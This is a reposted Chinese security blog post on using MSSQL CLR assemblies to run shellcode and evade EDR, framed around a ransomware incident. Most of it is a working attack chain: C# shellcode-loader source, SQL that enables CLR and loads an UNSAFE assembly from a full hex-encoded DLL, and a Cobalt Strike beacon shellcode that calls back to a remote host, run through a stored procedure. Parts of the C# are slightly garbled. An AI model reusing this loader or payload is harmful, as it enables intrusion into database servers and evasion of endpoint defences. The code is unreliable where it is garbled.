几天前,我处理了一个涉及MSSQL数据库的勒索事件,该事件可能会逃避EDR检测。我打算分享整个过程。
在分析情况后,我发现根本原因是一个弱密码 - 本质上是一种字典密码。黑客能够使用此弱密码登录到数据库,并注入了他的钴打击壳,从而完全控制了MSSQL Server。
什么是CLR
CLR,由Microsoft正式称为通用语言运行时,是.NET框架的组成部分,该框架已集成到SQL Server自2005年以来已集成到SQL Server中。这意味着您现在可以使用任何.NET框架语言,包括Microsoft Visual Basic .NET和Microsoft Visual C# - 编写存储过程,触发器,用户定义的类型,用户定义的功能,用户定义的聚合物和表值功能。
编译CLR组件
打开Visual Studio安装程序,然后单击modify
选择Data Storage and Processing工具
创建新项目
我的实验环境是MSSQL 2022,相关版本和脚本创建都已正确选择
完成新项目的添加后,当前大多数Windows服务器都在64位平台上运行,因此在这里我为64位平台提供了代码
using System;using Microsoft.SqlServer.Server;using System.Runtime.InteropServices;publicpartialclassStoredProcedures{ [SqlProcedure]publicstaticvoidshellcode_loader(string sc){// Place your code SqlContext.Pipe.Send(shellcode_exec(sc)); }publicstaticstringshellcode_exec(string sc){0x40);byte[] sa = newbyte[1000];int shellcode_len = sc.Length / 2;for (int i = 0; i < shellcode_len; i++){string code = "0x" + sc.Substring(i * 2, 2);int a = Convert.ToInt32(code, 16); sa[i] = (byte)a;}UInt64 shellcodeAddress = VirtualAlloc(0, (UInt64)sa.Length, 0x1000,Marshal.Copy(sa, 0, (IntPtr)(shellcodeAddress), sa.Length);CreateThread(0, 0, shellcodeAddress, 0, 0, 0);return""; } [DllImport("kernel32")]privatestaticextern UInt64 VirtualAlloc(UInt64 lpAddress, UInt64 dwSize,UInt64 flAllocationType, UInt64 flProtect); [DllImport("kernel32")]privatestaticextern UInt32 CreateThread(UInt32 lpThreadAttributes, UInt32dwStackSize, UInt64 lpStartAddress, UInt32 lpParameter, UInt32 dwCreationFlags,UInt32 lpThreadId);}
我们将在bin目录中获得一个SQL文件
我们必须抽象代码片段才能创建汇编
执行以下SQL语句
sp_configure 'clr enabled', 1GORECONFIGURE GOALTERDATABASEmasterSET TRUSTWORTHY ON;GOCREATEASSEMBLY [MSSQL_ShellCodeLoader] AUTHORIZATION [dbo]FROM0x4D5A90000300000004000000FFFF0000B800000000000000400000000000000000000000000000000000000000000000000000000000000000000000800000000E1FBA0E00B409CD21B8014CCD21546869732070726F6772616D2063616E6E6F742062652072756E20696E20444F53206D6F64652E0D0D0A2400000000000000504500004C010300DBD669650000000000000000E00022200B013000000A000000060000000000005E2800000020000000400000000000100020000000020000040000000000000006000000000000000080000000020000000000000300608500001000001000000000100000100000000000001000000000000000000000000C2800004F00000000400000D802000000000000000000000000000000000000006000000C000000D42600001C0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000200000080000000000000000000000082000004800000000000000000000002E746578740000006408000000200000000A000000020000000000000000000000000000200000602E72737263000000D80200000040000000040000000C0000000000000000000000000000400000402E72656C6F6300000C00000000600000000200000010000000000000000000000000000040000042000000000000000000000000000000004028000000000000480000000200050008210000CC05000001000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000004E00280500000A0228020000066F0600000A002A133006008E000000010000110020E80300008D090000010A026F0700000A185B0B160D2B2D0072010000700209185A186F0800000A280900000A130411041F10280A00000A130506091105D29C000917580D0907FE04130611062DC9166A068E696A20001000006A1F406A28030000060C061608280B00000A068E69280C00000A00161608161616280400000626720700007013072B0011072A2202280D00000A002A0042534A4201000100000000000C00000076342E302E33303331390000000005006C00000004020000237E0000700200009802000023537472696E677300000000080500000C000000235553001405000010000000234755494400000024050000A800000023426C6F620000000000000002000001471502140900000000FA013300160000010000000D00000002000000050000000C0000000D000000040000000100000001000000020000000100000002000000000032010100000000000600B800E0010600D800E00106008E00AE010F0000020000060063024C010A00A20086010A00880286010A00750086010600F6004C0106000E014C01060080024C010600A7014C0106002A01C1010000000012000000000001000100010010000F0200001500010001005020000000009600690153000100642000000000960030005800020000000000800091203F005D00030000000000800091205A0065000700FE20000000008618A10106000D00000001004C00000001004C00000001004302000002000701000003007D00000004006A0200000100200200000200FB00000003004D02000004007A01000005003302000006004F000900A10101001100A10106001900A1010A003100A101060039006C00100041006700150051001F012600510015012A0051005C02300059000A003600610074023C006900930241002900A101060020002300A0002E000B006F002E00130078002E001B0097001A000100000107003F000100000109005A000100048000000000000000000000000000000000530100000400000000000000000000004A002700000000000400000000000000000000004A001B00000000000000006B65726E656C333200546F496E743332003C4D6F64756C653E0053797374656D2E44617461006D73636F726C6962007368656C6C636F64655F65786563005669727475616C416C6C6F63007363006C705468726561644964004372656174655468726561640053656E64006765745F506970650053716C5069706500666C416C6C6F636174696F6E547970650044656275676761626C654174747269627574650053716C50726F63656475726541747472696275746500436F6D70696C6174696F6E52656C61786174696F6E734174747269627574650052756E74696D65436F6D7061746962696C6974794174747269627574650042797465006477537461636B53697A6500647753697A6500537472696E6700537562737472696E67006765745F4C656E677468004D61727368616C004D5353514C5F5368656C6C436F64654C6F616465722E646C6C0053797374656D004D5353514C5F5368656C6C436F64654C6F61646572007368656C6C636F64655F6C6F61646572006C70506172616D65746572004D6963726F736F66742E53716C5365727665722E536572766572002E63746F7200496E745074720053797374656D2E446961676E6F73746963730053797374656D2E52756E74696D652E496E7465726F7053657276696365730053797374656D2E52756E74696D652E436F6D70696C6572536572766963657300446562756767696E674D6F6465730053746F72656450726F63656475726573006C70546872656164417474726962757465730064774372656174696F6E466C616773006C7041646472657373006C7053746172744164647265737300436F6E636174004F626A65637400666C50726F74656374006F705F4578706C6963697400436F6E766572740053716C436F6E7465787400436F7079000005300078000001000000001899F70588C10A4B9408847FF516E945000420010108032000010520010111110400001221042001010E0B07081D05080B080E08020E032000080520020E08080500020E0E0E050002080E08040001180A080004011D0508180808B77A5C561934E089040001010E0400010E0E0700040B0B0B0B0B0900060909090B0909090801000800000000001E01000100540216577261704E6F6 E457863657074696F6E5468726F777301080100070100000000040100000000000000000000DBD6696500000000020000001C010000F0260000F008000052534453F44668E3C2CF6F49926FADC8983C8E9601000000453A5C6D7373716C2D70726F6A6563745C4461746162617365335C6F626A5C44656275675C4D5353514C5F5368656C6C436F64654C6F616465722E7064620000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000003428000000000000000000004E28000000200000000000000000000000000000000000000000000040280000000000000000000000005F436F72446C6C4D61696E006D73636F7265652E646C6C0000000000FF250020001000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001001000000018000080000000000000000000000000000001000100000030000080000000000000000000000000000001000000000048000000584000007C02000000000000000000007C0234000000560053005F00560045005200530049004F004E005F0049004E0046004F0000000000BD04EFFE00000100000000000000000000000000000000003F000000000000000400000002000000000000000000000000000000440000000100560061007200460069006C00650049006E0066006F00000000002400040000005400720061006E0073006C006100740069006F006E00000000000000B004DC010000010053007400720069006E006700460069006C00650049006E0066006F000000B801000001003000300030003000300034006200300000002C0002000100460069006C0065004400650073006300720069007000740069006F006E000000000020000000300008000100460069006C006500560065007200730069006F006E000000000030002E0030002E0030002E003000000054001A00010049006E007400650072006E0061006C004E0061006D00650000004D005300530051004C005F005300680065006C006C0043006F00640065004C006F0061006400650072002E0064006C006C0000002800020001004C006500670061006C0043006F0070007900720069006700680074000000200000005C001A0001004F0072006900670069006E0061006C00460069006C0065006E0061006D00650000004D005300530051004C005F005300680065006C006C0043006F00640065004C006F0061006400650072002E0064006C006C000000340008000100500072006F006400750063007400560065007200730069006F006E00000030002E0030002E0030002E003000000038000800010041007300730065006D0062006C0079002000560065007200730069006F006E00000030002E0030002E0030002E0030000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000002000000C000000603800000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000WITH PERMISSION_SET = UNSAFE;GOCREATEPROCEDURE [dbo].[shellcode_loader]@sc NVARCHAR (MAX)ASEXTERNALNAME [MSSQL_ShellCodeLoader].[StoredProcedures].[shellcode_loader]创建存储过程
打开MSSQL的CRL功能,然后创建存储过程
使用C编程语言在Cobalt Strike中生成shell
使用Python脚本转换ShellCode的格式
defhex_convert(): byte_sequence =b'xfcx48x83xe4xf0xe8xc8x00x00x00x41x51x41x50x52x51x56x48x31xd2x65x48x8bx52x60x48x8bx52x18x48x8bx52x20x48x8bx72x50x48x0fxb7x4ax4ax4dx31xc9x48x31xc0xacx3cx61x7cx02x2cx20x41xc1xc9x0dx41x01xc1xe2xedx52x41x51x48x8bx52x20x8bx42x3cx48x01xd0x66x81x78x18x0bx02x75x72x8bx80x88x00x00x00x48x85xc0x74x67x48x01xd0x50x8bx48x18x44x8bx40x20x49x01xd0xe3x56x48xffxc9x41x8bx34x88x48x01xd6x4dx31xc9x48x31xc0xacx41xc1xc9x0dx41x01xc1x38xe0x75xf1x4cx03x4cx24x08x45x39xd1x75xd8x58x44x8bx40x24x49x01xd0x66x41x8bx0cx48x44x8bx40x1cx49x01xd0x41x8bx04x88x48x01xd0x41x58x41x58x5ex59x5ax41x58x41x59x41x5ax48x83xecx20x41x52xffxe0x58x41x59x5ax48x8bx12xe9x4fxffxffxffx5dx6ax00x49xbex77x69x6ex69x6ex65x74x00x41x56x49x89xe6x4cx89xf1x41xbax4cx77x26x07xffxd5x48x31xc9x48x31xd2x4dx31xc0x4dx31xc9x41x50x41x50x41xbax3ax56x79xa7xffxd5xebx73x5ax48x89xc1x41xb8x4bx1fx00x00x4dx31xc9x41x51x41x51x6ax03x41x51x41xbax57x89x9fxc6xffxd5xebx59x5bx48x89xc1x48x31xd2x49x89xd8x4dx31xc9x52x68x00x02x40x84x52x52x41xbaxebx55x2ex3bxffxd5x48x89xc6x48x83xc3x50x6ax0ax5fx48x89xf1x48x89xdax49xc7xc0xffxffxffxffx4dx31xc9x52x52x41xbax2dx06x18x7bxffxd5x85xc0x0fx85x9dx01x00x00x48xffxcfx0fx84x8cx01x00x00xebxd3xe9xe4x01x00x00xe8xa2xffxffxffx2fx52x4ex50x6dx00xa4xc1x12x2fx52x7fxdaxdbx19x11x20x16x2fx85xc8x97x87xd4xc7xfcx3fx20xb2xc9xedx23x14x12x02x8cx22xcbx04x9cxd3x02x2cx42x0exf2xb6x17x2ax11x9dx7bx2exe0x1bx52x05xc6x53x86xcax1exb6x2cxa0xb2x3dx13x89x5ex93xf1x03x3bxa5xf9xcexa4xc8x00x55x73x65x72x2dx41x67x65x6ex74x3ax20x4dx6fx7ax69x6cx6cx61x2fx35x2ex30x20x28x63x6fx6dx70x61x74x69x62x6cx65x3bx20x4dx53x49x45x20x39x2ex30x3bx20x57x69x6ex64x6fx77x73x20x4ex54x20x36x2ex31x3bx20x57x4fx57x36x34x3bx20x54x72x69x64x65x6ex74x2fx35x2ex30x3bx20x4dx41x54x50x3bx20x4dx41x54x50x29x0dx0ax00x90x43x13x5bx13x34x7dx9fx7ex65x68x85xfax95xa8xb8xfcx36xecx75x24x1dx8fxc5xa4xc7x06x55x35xf6x14x82x31x46x25x94x14x70x7ex49x9cx0bx3exefx29x03xccx77x72x23xdcxf9x9dx8ex93x6axefx36x76xa3x63x60xe8x60xb6x8fx08x48xb4x0cxa5x03x44x0ax4cxb1x36x99xe6xe0x3cxc7xccx05x74x18x49x1ax61x39xd9x58xe0xbdxddx74x3ax24xe6x91xa4xfdx70xccxd2xcfx20x76x63x47xe1x5bx32x34x87x05x13x6ex4dxd7x21x29xdcxf6x5bx4ax05x72xdfxfbxe7xd6x27x04x6ax18xc8x8dx55x49x43xaexe8x46x85x35x43x0ax1fx83x04x20xbax10x97xe4x36x3ax0axacx77x07x42x86x17x73x53x73x3fx0ex0bx5axd0x6ax03xd6x39x59xafx8fxa1x51xa3xb8x45xa1x82x26x0ex9dxa7x01xe7x76x5ex42xb9x4bx14x4cxc8x27xecx8bx7ax58x00x41xbexf0xb5xa2x56xffxd5x48x31xc9xbax00x00x40x00x41xb8x00x10x00x00x41xb9x40x00x00x00x41xbax58xa4x53xe5xffxd5x48x93x53x53x48x89xe7x48x89xf1x48x89xdax41xb8x00x20x00x00x49x89xf9x41xbax12x96x89xe2xffxd5x48x83xc4x20x85xc0x74xb6x66x8bx07x48x01xc3x85xc0x75xd7x58x58x58x48x05x00x00x00x00x50xc3xe8x9fxfdxffxffx31x39x32x2ex31x36x38x2ex33x2ex31x33x30x00x3axdex68xb1' convert_string = ''.join(format(byte, '02x') for byte in byte_sequence) print(convert_string)if __name__ == '__main__': hex_convert()
exec shellcode_loader'fc4883e4f0e8c8000000415141505251564831d265488b5260488b5218488b5220488b7250480fb74a4a4d31c94831c0ac3c617c022c2041c1c90d4101c1e2ed524151488b52208b423c4801d0668178180b0275728b80880000004885c074674801d0508b4818448b40204901d0e35648ffc9418b34884801d64d31c94831c0ac41c1c90d4101c138e075f14c034c24084539d175d858448b40244901d066418b0c48448b401c4901d0418b04884801d0415841585e595a41584159415a4883ec204152ffe05841595a488b12e94fffffff5d6a0049be77696e696e65740041564989e64c89f141ba4c772607ffd54831c94831d24d31c04d31c94150415041ba3a5679a7ffd5eb735a4889c141b84b1f00004d31c9415141516a03415141ba57899fc6ffd5eb595b4889c14831d24989d84d31c9526800024084525241baeb552e3bffd54889c64883c3506a0a5f4889f14889da49c7c0ffffffff4d31c9525241ba2d06187bffd585c00f859d01000048ffcf0f848c010000ebd3e9e4010000e8a2ffffff2f524e506d00a4c1122f527fdadb191120162f85c89787d4c7fc3f20b2c9ed231412028c22cb049cd3022c420ef2b6172a119d7b2ee01b5205c65386ca1eb62ca0b23d13895e93f1033ba5f9cea4c800557365722d4167656e743a204d6f7a696c6c612f352e302028636f6d70617469626c653b204d53494520392e303b2057696e646f7773204e5420362e313b20574f5736343b2054726964656e742f352e303b204d4154503b204d415450290d0a009043135b13347d9f7e656885fa95a8b8fc36ec75241d8fc5a4c7065535f614823146259414707e499c0b3eef2903cc777223dcf99d8e936aef3676a36360e860b68f0848b40ca503440a4cb13699e6e03cc7cc057418491a6139d958e0bddd743a24e691a4fd70ccd2cf20766347e15b32348705136e4dd72129dcf65b4a0572dffbe7d627046a18c88d554943aee8468535430a1f830420ba1097e4363a0aac77074286177353733f0e0b5ad06a03d63959af8fa151a3b845a182260e9da701e7765e42b94b144cc827ec8b7a580041bef0b5a256ffd54831c9ba0000400041b80010000041b94000000041ba58a453e5ffd5489353534889e74889f14889da41b8002000004989f941ba129689e2ffd54883c42085c074b6668b074801c385c075d758585848050000000050c3e89ffdffff3139322e3136382e332e313330003ade68b1'
作者:pyn3rd
原文地址:https://blog.pyn3rd.com/2024/11/22/How-to-use-MSSQL-CLR-assembly-to-bypass-EDR/
原文始发于微信公众号(Ots安全):如何使用MSSQL CLR组件绕过EDR
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论